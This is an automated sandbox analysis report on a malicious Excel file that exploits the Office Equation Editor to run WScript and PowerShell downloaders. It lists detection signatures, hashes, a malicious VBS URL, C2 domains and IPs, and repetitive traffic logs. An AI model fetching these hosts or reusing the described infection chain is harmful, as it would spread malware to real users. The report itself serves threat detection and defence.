Windows Analysis Report
xF3wienia PO2102559-1.xlsx

Overview

General Information

Sample name: xF3wienia PO2102559-1.xlsx
Analysis ID: 1430780
MD5: 06fd382c8c40f2ce72e90514cda560cc
SHA1: 1dc8dbd9622345985343345b938bd97004621e56
SHA256: 5c235e5cae22c77b759b197a0758357bdb7a2a6c92c0edf829132c50108c668a
Tags: xlsx
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Document contains OLE streams with names of living off the land binaries
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

barindex
Source: xF3wienia PO2102559-1.xlsx Avira: detected
Source: http://blessy.ydns.eu/jimbo/prnportjjm.vbs Avira URL Cloud: Label: malware
Source: uploaddeimagens.com.br Virustotal: Detection: 6% Perma Link
Source: https://uploaddeimagens.com.br Virustotal: Detection: 6% Perma Link
Source: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820 Virustotal: Detection: 14% Perma Link
Source: xF3wienia PO2102559-1.xlsx ReversingLabs: Detection: 63%
Source: xF3wienia PO2102559-1.xlsx Virustotal: Detection: 53% Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 5.182.211.151 Port: 80 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb99 source: powershell.exe, 00000008.00000002.446551677.000000000515E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256+ source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0356049E ShellExecuteExW,ExitProcess, 2_2_0356049E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035604BC ExitProcess, 2_2_035604BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035603BC LoadLibraryW, 2_2_035603BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_0356043D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03560487 ShellExecuteExW,ExitProcess, 2_2_03560487
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic DNS query: name: blessy.ydns.eu
Source: global traffic DNS query: name: pastebin.com
Source: global traffic DNS query: name: pastebin.com
Source: global traffic DNS query: name: pastebin.com
Source: global traffic DNS query: name: uploaddeimagens.com.br
Source: global traffic DNS query: name: ajai.ydns.eu
Source: global traffic DNS query: name: ajai.ydns.eu
Source: global traffic DNS query: name: ajai.ydns.eu
Source: global traffic DNS query: name: ajai.ydns.eu
Source: global traffic DNS query: name: ajai.ydns.eu
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
